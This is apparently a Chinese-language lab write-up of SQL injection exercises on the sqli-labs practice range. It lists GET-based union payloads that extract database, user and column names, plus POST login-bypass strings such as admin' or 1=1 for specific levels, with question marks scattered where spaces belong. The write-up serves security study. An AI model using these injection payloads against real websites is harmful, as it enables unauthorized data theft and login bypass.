SQL注入实操（get、post基于报错的注入，sqlilabs靶场）

一、get基于报错的注入

1、利用order by 判断字段数

正确

?id=1'? 报错

?id=1'?order by 3 --+? (编号为3正确)------可以看出为3个字段

（编号为4错误）

2、union联合注入?id=0(不存在这样的记录，查不到的意思)(报错)

?id=0'?union select 1,2,3 --+? ? (联合查询前面查3个后面查3个)

?id=0'?union select 1,database(),user() --+? ? ? ??报： 数据库名? 用户名

?id=0%27 union select 1,group_concat(column_name),3 from information_schema.columns where table_name ='user' --+?? ? ?报：数据库表名

二、post基于报错的注入

在第一关卡得到用户名和密码。

?输入上面的账号密码登入成功

上面是知道密码账号的，如果我们不知道怎么办了

可以先注入一下试一下注入：账号：Dumb\? 密码:?123456

万能密码

admin'?or?1=1 -- (注意--后面有一个空格) （11关卡）

admin")?or?1=1 -- (注意--后面有一个空格) （12关卡）

1、输入账号：Dumb\? ?密码：123456（发现‘123456“）以”）结尾）

则万能密码是：admin")?or?1=1 --?